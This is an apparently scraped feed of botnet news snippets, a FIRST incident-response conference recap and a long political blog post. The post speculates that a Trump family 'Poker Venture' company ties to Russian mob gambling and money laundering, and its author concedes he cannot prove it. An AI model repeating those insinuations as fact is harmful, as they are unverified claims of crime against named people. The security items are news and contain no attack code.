|Twitter Being Used As Botnet Command Channel|
Ah Twitter in the news again, the bad guys sure do keep up with new trends. After being taken offline for a while by a Joejob DDoS attack Twitter is in the news again – this time it’s being used as the command channel for a Botnet. The normal method for controlling Botnets is via […]
|Torpig Botnet Hijacking Reveals 70GB Of Stolen Data|
We did mention Torpig in passing back in January 2008 when talking about the Mebroot rootkit which digs down deep into the Master Boot Record. It seems like Torpig has been pretty active since then and the latest break is that some security researchers have managed to infiltrate the botnet and collect some data on […]
The post Torpig Botnet Hijacking Reveals 70GB Of Stolen Data appeared first on Darknet - The Darkside.
|New Conficker Variant More Aggressive|
Conficker has gotten quite a lot of news recently with it growing so fast and Microsoft offering a bounty for the authors. It seems like the Conficker authors are really serious about retaining control of their botnet and expanding it further without hindrance from the companies trying to stop them. It’s quite likely they are […]
|Le début de la fin pour le botnet Mirai ?||Un botnet qui commencerai à s'essoufler ? |
|Xavier Mertens: FIRST TC Amsterdam 2017 Wrap-Up|
Here is my quick wrap-up of the FIRST Technical Colloquium hosted by Cisco in Amsterdam. This is my first participation to a FIRST event. FIRST is an organization helping in incident response as stated on their website:
The event was organized at Cisco office. Monday was dedicated to a training about incident response and the two next days were dedicated to presentations. All of them focussing on the defence side (“blue team”). Here are a few notes about interesting stuff that I learned.
The first day started with two guys from Facebook: Eric Water @ Matt Moren. They presented the solution developed internally at Facebook to solve the problem of capturing network traffic: “PCAP don’t scale”. In fact, with their solution, it scales! To investigate incidents, PCAPs are often the gold mine. They contain many IOC’s but they also introduce challenges: the disk space, the retention policy, the growing network throughput. When vendors’ solutions don’t fit, it’s time to built your own solution. Ok, only big organizations like Facebook have resources to do this but it’s quite fun. The solution they developed can be seen as a service: “PCAP as a Service”. They started by building the right hardware for sensors and added a cool software layer on top of it. Once collected, interesting PCAPs are analyzed using the Cloudshark service. They explained how they reached top performances by mixing NFS and their GlusterFS solution. Really a cool solution if you have multi-gigabits networks to tap!
The next presentation focused on “internal network monitoring and anomaly detection through host clustering” by Thomas Atterna from TNO. The idea behind this talk was to explain how to monitor also internal traffic. Indeed, in many cases, organizations still focus on the perimeter but internal traffic is also important. We can detect proxies, rogue servers, C2, people trying to pivot, etc. The talk explained how to build clusters of hosts. A cluster of hosts is a group of devices that have the same behaviour like mail servers, database servers, … Then to determine “normal” behaviour per cluster and observe when individual hosts deviate. Clusters are based on the behaviour (the amount of traffic, the number of flows, protocols, …). The model is useful when your network is quite close and stable but much more difficult to implement in an “open” environment (like universities networks).
Then Davide Carnali made a nice review of the Nigerian cybercrime landscape. He explained in details how they prepare their attacks, how they steal credentials, how they deploy the attacking platform (RDP, RAT, VPN, etc). The second part was a step-by-step explanation how they abuse companies to steal (sometimes a lot!) of money. An interesting fact reported by Davide: the time required between the compromisation of a new host (to drop malicious payload) and the generation of new maldocs pointing to this host is only… 3 hours!
The next presentation was performed by Gal Bitensky ( Minerva): “Vaccination: An Anti-Honeypot Approach”. Gal (re-)explained what the purpose of a honeypot and how they can be defeated. Then, he presented a nice review of ways used by attackers to detect sandboxes. Basically, when a malware detects something “suspicious” (read: which makes it think that it is running in a sandbox), it will just silently exit. Gal had the idea to create a script which creates plenty of artefacts on a Windows system to defeat malware. His tool has been released here.
Paul Alderson (FireEye) presented “Injection without needles: A detailed look at the data being injected into our web browsers”. Basically, it was a huge review of 18 months of web-inject and other configuration data gathered from several botnets. Nothing really exciting.
The next talk was more interesting… Back to the roots: SWITCH presented their DNS Firewall solution. This is a service they provide not to their members. It is based on DNS RPZ. The idea was to provide the following features:
Indeed, when a DNS request is blocked, the user is redirected to a landing page which gives more details about the problem. Note that this can have a collateral issue like blocking a complete domain (and not only specific URLs). This is a great security control to deploy. Note that RPZ support is implemented in many solutions, especially Bind 9.
Finally, the first day ended with a presentation by Tatsuya Ihica from Recruit CSIRT: “Let your CSIRT do malware analysis”. It was a complete review of the platform that they deployed to perform more efficient automatic malware analysis. The project is based on Cuckoo that was heavily modified to match their new requirements.
The second day started with an introduction to the FIRST organization made by Aaron Kaplan, one of the board members. I liked the quote given by Aaron:
Then, the first talk was really interesting: Chris Hall presented “Intelligence Collection Techniques“. After explaining the different sources where intelligence can be collected (open sources, sinkholes, …), he reviewed a serie of tools that he developed to help in the automation of these tasks. His tools addresses:
All the tools are available here. A very nice talk with tips & tricks that you can use immediately in your organization.
The next talk was presented by a Cisco guy, Sunil Amin: “Security Analytics with Network Flows”. Netflow isn’t a new technology. Initially developed by Cisco, they are today a lot of version and forks. Based on the definition of a “flow”: “A layer 3 IP communication between two endpoints during some time period”, we got a review the Netflow. Netflow is valuable to increase the visibility of what’s happening on your networks but it has also some specific points that must be addressed before performing analysis. ex: de-duplication flows. They are many use cases where net flows are useful:
I would expect a real case where net flow was used to discover something juicy. The talk ended with a review of tools available to process net flow data: SiLK, nfdump, ntop but log management can also be used like the ELK stack or Apache Spot. Nothing really new but a good reminder.
Then, Joel Snape from BT presented “Discovering (and fixing!) vulnerable systems at scale“. BT, as a major player on the Internet, is facing many issues with compromized hosts (from customers to its own resources). Joel explained the workflow and tools they deployed to help in this huge task. It is based on the following circle: Introduction, data collection, exploration and remediation (the hardest part!).
I like the description of their “CERT dropbox” which can be deployed at any place on the network to perform the following tasks:
An interesting remark from the audience: ISP don’t have only to protect their customers from the wild Internet but also the Internet from their (bad) customers!
Feike Hacqueboard, from TrendMicro, explained: “How political motivated threat actors attack“. He reviewed some famous stories of compromised organizations (like the French channel TV5) then reviewed the activity of some interesting groups like C-Major or Pawn Storm. A nice review of the Yahoo! OAuth abuse was performed as well as the tab-nabbing attack against OWA services.
Finally, two other Cisco guys, Steve McKinney & Eddie Allan presented “Leveraging Event Streaming and Large Scale Analysis to Protect Cisco“. CIsco is collecting a huge amount of data on a daily basis (they speak in Terabytes!). As a Splunk user, they are facing an issue with the indexing licence. To index all these data, they should have extra licenses (and pay a lot of money). They explained how to “pre-process” the data before sending them to Splunk to reduce the noise and the amount of data to index.
The idea is to pub a “black box” between the collectors and Splunk. They explained what’s in this black box with some use cases:
Some useful tips that gave and that are valid for any log management platform:
Two intense days full of useful information and tips to better defend your networks and/or collect intelligence. The slides should be published soon.
|Wordpress Hacker Bot Surge - Trojan/Zombie/Botnet WordPress Spam Blogs||Hey folks - as many of you already know, I'm not a Wordpress fan (i.e., bias - MyST Blogsite), but I am a fan of stopping hackers and other nefarious web activity that threatens businesses.
While reviewing some real time tada a few minutes ago, I noticed more than 400 Wordpress Hacker Bots attacking one of our server banks just in the last 10 minutes. Thankfully we have some very sophisticated defense systems that protect our blogsite clients, but most Wordpress sites are unable to defend against security breaches that are reident in Wordpress to begin with.
I've read many posts on AR where folks using Wordpress are particularly angry about being hacked, but I have a hunch that Wordpress itself is a big part of the problem.
Perhaps (as a group) you should look carefully at your server logs and see what services are actually running lots of outbound requests and where they are going. I suspect those of you that are unknowingly harboring this threat might be able to apply a security patch or correction to remove this nasty beast. Kevin Burton didn't have a fix back in March, but he did know what it was - Trojan/ZombieBotnet.
The data below shows a pattern representing more than 2 million requests in one day by more than 3,000 total bots hitting just one of our many servers. This is up more than 50% in the last few days, so this trojan worm seems to be spreading and it's doing so on many versions of Wordpress. Read more about compromised Wordpress blogs.
|NEW INFO: A strange "Poker Venture" run out of Trump Tower||First: A plea for help. I rarely run fundraisers on this site, but an emergency just hit. After spending my meager savings on frivolities like medicine and a new video card, MY BLOODY AIR CONDITIONER DIED. I live in a very hot attic in a very humid part of the country. When the outside temperature turns hellish, it becomes even hellisher up here -- for me, for my ladyfriend, and for my poor diabetic doggiefriend George. |
If you "ding" the PayPal button to your left (you may have to scroll down), your generous contribution will go straight to the air conditioner fund. We don't need a big 'un. Our gratitude will be beyond words.
Before we get to our main investigative piece, we need to look at a couple of other stories...
Terror in the UK: Our sympathies and thoughts go out to the victims of the attack on the Finsbury Park Mosque, which has finally been officially labeled an act of terrorism.
Witnesses said he 'deliberately' drove onto the pavement outside north London's Muslim Welfare House - yards from the Finsbury Park Mosque - and jumped out of the cab shouting 'I'm going to kill all Muslims - I did my bit'.A similar horror took place in Virginia:
A 17-year-old Muslim girl identified as Nabra was kidnapped and beaten to death early Sunday morning in Sterling, Virginia. She was reported as missing at roughly 4 a.m. and now police believe they have found her body in a pond.So far, Donald Trump's twitter feed has mentioned neither of these outrages.
Roger Stone. The Roger Stone/Alex Jones team-up has been absolutely boggling. After building a formidable rep as a conspiratorial-mastermind-for-hire, Stone now pretends to be the victim of dark and evil forces. It's a surreal situation: Roger Stone is one of the original Watergaters and the king of the dirty tricksters, yet our modern paranoia addicts consider him an apostle of fair play and decency. What's next? Will the Infowarriors proclaim Pablo Escobar to be the saint of non-violence?
Stone's name came up an NBC News story published yesterday: "NBC News Exclusive: Memo Shows Watergate Prosecutors Had Evidence Nixon White House Plotted Violence." In 1972, Nixonians planned to use bullyboys from YAF (Young Americans for Freedom, a notorious right-wing group of the time) to mount a violent physical attack against Daniel Ellsberg as he spoke -- along with William Kunstler and other notables -- at an anti-war rally on the Capitol steps. The Watergate Committee investigated the incident and outlined their findings in a memo that has remained unreleased until now.
Roger Stone was also interviewed. Here's a tidbit that everyone seems to have missed...
"Carl Rove"? Is that Turdblossom back when he was a young turd? Must be! Stone now seems to despise Rove, calling him a "political profiteer" -- unlike Stone himself, who always does what he does for the purest of motives, just like Jesus or Barry Allen. Also see here.
Ivanka, Donald and their "Poker Venture." Just after I had announced to the world that I was so over Louise Mensch, she publishes a truly fascinating bit of research which relies on open-source material instead of nameless informants. Okay, okay: The Nameless Ones do pop up in a couple of paragraphs. Readers of her piece should mentally excise those bits and double-check the rest.
Ivanka has been linked to eleven companies in the Trump financial disclosures. Her status has been put to “Inactive” on several odd holding companies...
The most immediately interesting company of Ivanka Trump’s is “Poker Venture Managing Member Corp“. This is owned by Donald and Ivanka Trump. Ivanka’s company with her father itself is an officer of this very dodgy-looking shell, “Poker Venture LLC.” Judging by the corporation wiki, there is panic in Team Ivanka and Team Trump over “Poker Venture“. It shows zero “Key People”, and has two other almost identical companies as its officers – the live, active PVMMC that Ivanka co-owns with her pops, and this “Inactive” attempt to clean Ivanka out of the picture: by: Poker Venture Managing Member Corp by: Donald J. Trump.I'll say! Beyond the fact that Trump allegedly divested himself of his business interests, isn't it a little unseemly for the President of the United States to be listed as the owner of a company called Poker Venture Managing Member Corp, which filed in Nevada?
This company is related to another enterprise called simply Poker Ventures, whose listed address is 725 5th Avenue, New York, NY -- Trump Tower. Mensch seems to have missed that part, although she thinks that this "Poker" business somehow links up to the botnet which she believes is run out of Trump Tower. (I see no evidence for this beyond the inscrutable pronouncements of The Nameless Ones.)
I'll tell you something else that Louise Mensch seems to have missed: This Poker Venture business appears to link up to some scandalous doings outlined in one of my previous posts (of which I happen to be quite proud). It's hard to summarize that complicated piece, but I'll try.
A Russian "Godfather" named Alimzhan Tokhtakhounov ran a shady operation out of Trump Tower -- specifically, unit 63A, not far below Trump's own living quarters. It was so shady that the FBI had bugged the joint. (We're talking money laundering.)
Tokhtakhounov -- known as "Little Taiwan" or "Taiwanchik" because he looks Asian -- is the guy who linked Donald Trump up with the world of beauty contests in Russia. Taiwanchik has his fingers in all sorts of interesting deals -- for example, he was once arrested for rigging an Olympic figure skating competition.
Tokhtakhounov had partners in his New York enterprise -- Vadim Trincher and Anatoly Golubchik. (Trincher was the 2009 world poker champion.) They were tried and convicted. Guess who put 'em away? Preet Bharara.
Dirty money must needs be laundered, right? One great way to launder money is via the world of art. Banks won't ask too many questions if you tell 'em that someone just paid twenty million for a Picasso.From a 2013 story in the NYT:
Mr. Nahmad, a night-life fixture known for his showy extravagance and celebrity crowd — a $21 million Trump Tower apartment and friendships with people like Gisele Bündchen and Leonardo DiCaprio — was charged in April in a racketeering indictment brought by federal prosecutors in Manhattan. He was accused of being part financier, part money launderer and part bookmaker in a network that organized poker games and sports betting operations and drew hundred-thousand-dollar wagers from celebrities and billionaires.The feds knew his secrets because they were listening in on Nahmad's cellphone chats.
But Helly’s interest in gambling led to trouble. The high-stakes poker and sports-betting ring that he is accused of helping to lead — with activity stretching from New York and Los Angeles — ultimately came to the attention of federal authorities who were investigating Russian organized crime figures.All of this has to do with the world of high-stakes poker. These people linked up with a coast-to-coast gambling operation which attracted a number of Hollywood celebrities, including Ben Affleck and Tobey Maguire.
My original post has many more details -- and by "many" I mean MANY. (Check out the Cyprus connection, which takes in Nahmad, Taiwanchik and Trump himself.) But right now, I want you to focus on "the holy game of poker."
1. Donald and Ivanka run something called "Poker Venture," headquartered in Trump Tower but incorporated in Nevada.
2. Directly below Trump's living quarters was a crooked enterprise run by Russian crime lord Alimzhan Tokhtakhounov, whose links to Trump himself are beyond dispute. Tokhtakhounov got away; he is now in Russia.
3. Helly Nahmad, who also had a Trump Tower address, was involved with a nationwide (actually international) high-stakes poker ring.
4. Nahmad and Tokhtakhounov deny knowing each other, even though Preet Bahrara named them both as co-defendants when he made a case against this money laundering/gambling operation. They also both link up with Trincher and the other defendants.
It may be as well to quote from the above-cited 2013 US Attorney's Office press release:
The Taiwanchik-Trincher Organization is a nationwide criminal enterprise with strong ties to Russia and Ukraine. The leadership of the organization ran an international sportsbook that catered primarily to Russian oligarchs living in Russia and Ukraine and throughout the world. The Taiwanchik-Trincher Organization laundered tens of millions of dollars in proceeds from the gambling operation from Russia and the Ukraine through shell companies and bank accounts in Cyprus, and from Cyprus into the U.S. Once the money arrived in the U.S, it was either laundered through additional shell companies or invested in seemingly legitimate investments, such as hedge funds or real estate.Speaking of which: Many people have wondered who helped Jared Kushner purchase that ridiculously overpriced skyscraper at 666 Fifth Avenue. (I'm not claiming to have proof of a connection. I'm just sayin'.) For that matter, quite a few people have asked wondered why anyone would invest in Donald Trump's various properties, given the rather odd way he does business.
Let's get back to that press release:
The Nahmad-Trincher Organization is a nationwide criminal enterprise with leadership in Los Angeles, California, and New York City. The organization ran a high-stakes illegal gambling business that catered primarily to multi-millionaire and billionaire clients. The organization utilized several online gambling websites that operated illegally in the U.S. Debts owed to the Nahmad-Trincher Organization sometimes reached hundreds of thousands of dollars and even millions.
NYPD Commissioner Raymond W. Kelly said: “The subjects in this case ran high-stakes illegal poker games and online gambling, proceeds from which are alleged to have been funneled to organized crime overseas. The one thing they didn't bet on was the New York City police and federal investigators’ attention. I commend the NYPD Organized Crime Investigations Division and their partners in the FBI and U.S. Attorney Bharara's office for identifying and bringing the members of this organization to justice.”Well, we know what Trump did to Bharara. No good deed goes unpunished.
The question before us is this: Is the "Poker Ventures" that lists Donald and Ivanka as owners -- and which lists Trump Tower as its address -- part of the very real "poker venture" run by criminals living right below Donald's feet in that very same building?
I can't prove it. But the nomenclature sure as hell makes the idea seem inescapable.
Nomenclature isn't all we have to go on. Let's return to Louise Mensch's article (stressing, once again, that this piece -- unlike much of her recent work -- derives from open sources, all properly cited)...
Equally odd is that the state of New Jersey – (Ivanka Trump has a New Jersey address listed as one of her business records, associated with Poker Ventures) – has added to its newly published list of “Internet Gaming Ancillary Companies” both Poker Ventures LLC, which was already listed, but also “Novacorp Net Ltd”, “VidMob Inc” and “Reblaze Technologies”.So: Poker Ventures has to do with online gambling. (The legality of online gaming is a matter of some dispute.) Remember: The crooked Nahmad/Trincher operation also involved online gambling.
And Poker Ventures LLC does indeed appear on that list compiled by the state of New Jersey. See for yourself.
Mensch goes on to connect Poker Ventures up with some other notable names on that list, shady concerns which have definite connections to both Russians and Israelis. One of these enterprises, Reblaze Technologies, seems to have little to do with gambling and much to do with hacking:
...it publishes anti-NSA blogs such as these, lauding the ‘hacking tools’ leaked by Shadow Brokers. Reblaze also offers lists of “protect your website” services you can buy from Russian hackers [sic], listing, ostensibly to protect against them, the full range of tools employed on Russia’s hack of America; its founder repeated the anti-NSA blog in an article that reads as a threat to hack America on Medium in December 2016.Fascinating stuff. That "protect your website" scam reminds me of the hoary "watch your car" racket illustrated in those old Dead End Kid movies. You should hit those links; they take you into very odd places.
Unfortunately, we don't yet have any proof (beyond the word of Mensch's Nameless Ones) that this Reblaze business is tied up with Trump's Poker Ventures. Pity that: The possibilities are very intriguing.
For that matter, I must reiterate that I cannot prove that Donald and Ivanka's weird foray into the worlds of poker and online gaming is part-and-parcel of the poker and online gaming operation run by Helly Mahmad and his Russian gangster associates. But come on: It's hard not to conclude that we're dealing with two ingredients from the same stew-pot. These poker-related ventures form a Venn diagram in which the two circles seem nearly congruent. You can't fairly accuse me of leaping to wild conclusions: This ain't the kind of hazy guff you get from Alex Jones.
Louise Mensch, if you're reading these words: Thanks for returning to the world of real investigative writing. In the future, I hope you stop relying on the private sources who have provided you with so many dubious scoops. You'll have much more impact if you continue to provide stories that can be verified.
I strongly urge you to look into the possible links between "Poker Ventures" and the real-world poker venture in Trump Tower.
And please: Next time you feel tempted to accuse a perceived adversary of being a Russian spy, bite your tongue until it bleeds. A little more caution in your rhetoric will help you in the long run.
Finally: If these words have proven intriguing or enlightening to you, please consider dinging that PayPal account. It's already infernally muggy in here -- several degrees hotter than the temps outside. I feel like I'm melting.
|Una nueva vulnerabilidad puede convertir en permanentes las infecciones de Mirai|
Seguramente muchos de vosotros recordaréis cuando a finales del año pasado la botnet Mirai causaba estragos a lo largo y ancho de todo el mundo. Parecía que en materia de botnets (sobre todo en el caso de Mirai) las noticias estaban algo más tranquilas, y de repente vuelven a ser actualidad.
Según se ha publicado en Bleeping Computer Mirai vuelve a la primera plana debido a una vulnerabilidad descubierta recientemente que afecta a los equipos IoT, que puede hacer que las infecciones de esta botnet sean permanentes en lugar de desaparecer cuando el usuario los reiniciaba.
El malware que ataca a los dispositivos IoT suele desaparecer con los reinicios debido a que este procedimiento borra la memoria RAM de la máquina y la deja totalmente limpia. Dado que por ahora la mayoría de malwares del IoT se alojan ahí, es "fácil" librarse de ellas. Sin embargo, esta noticia lo cambia todo.
Al parecer los investigadores de seguridad de la firma Pen Test Partners que la han descubierto estaban estudiando las características de seguridad de 30 marcas de aparatos DVR (grabadores de vídeo digital). Y precisamente esta vulnerabilidad permitiría que Mirai sobreviviese entre reinicios.
Como es lógico, los investigadores de seguridad no han querido publicar ningún detalle sobre esta vulnerabilidad. Los expertos entienden que existen razones para creer que actores maliciosos podrían aprovecharse de sus descubrimientos para realizar actividades delictivas.
El alcance de Mirai podría aumentar gracias a esta vulnerabilidad
La investigación de Pen Test Partnerts ha revelado otros detalles que permitirían que Mirai volviese a ser relevante y aún más peligrosa de lo que era antes:
Todos estos fallos podrían provocar que Mirai volviese a la vida si se aprovechasen. Según el medio, esta familia de malware ha ido perdiendo terreno frente a otras amenazas como Persirai, BrickerBot o Hajime.
|SiteVision May News & Tips||US Disrupts Giant Botnet U.S. authorities are in process of taking down a huge botnet Kelihos controlling tens of thousands of infected computers that distribute email ransomware and malware globally. The in process dismantling will allow the authorities to identify victims and aid them, as well as blocking attempts to infect others. See more at […]|
|Network Security Today | @CloudExpo #Cloud #AI #SDN #Security #Analytics||In its 2017 State of Malware Report, Malwarebytes Labs recorded a 267 percent increase in ransomware between January 2016 and November 2016, with over 400 different variants in total. The report noted that while malware authors mostly relied on ransomware to make the bulk of their revenues, there was an increase in ad fraud as well. Botnets and mobile malware also continue to expand and evolve. The report predicts that until IoT devices become secure out of the box, botnets will get even bigger and pose an even greater threat to the internet – and any company connected to it.|
|Network Security Report 2016-2017|
|Commentaires sur T411 : Canal VOD surfe sur la fermeture et promet -50% de réduction aux déçus par Botnet Universe||Tu as tout dis frère :-)|
|A Storm of Scary Email||One of the hallmarks of the Storm botnet is the ubiquitous greeting card spam it sends out. The email generally include a link that leads to a bogus 'viewer' for...
|Using DNS as a C2 channel||tl,dr; DNS C2 added to my Powershell botnet, Galvatron. One of my planned extensions to Galvatron was to add DNS command and control, using the very same database and bot commands. This would provide yet another avenue to egress out the network. And the best part? The egress traffic is written into actual DNS request […]|
|Stronger IoT Passwords to Prevent Mirai Botnet Attacks||The Dyn DNS attack that happened last year is the largest distributed denial of service (DDoS) attack on record, simply because of the enormity of the connected devices involved and the number of businesses that were impacted by it. The Mirai malware, responsible for this attack, compromised hundreds of thousands of connected devices with default […]|
|FBI, EuroPol And NCA Hijack Botnet And What You Should Do||I love it when life is made hard for cyber criminals, but the truth is it doesn't happen very often . You would think writing malicious code is hard, but it often isn't. You would think that users follow simple security best practice and that attackers have to come up [...]|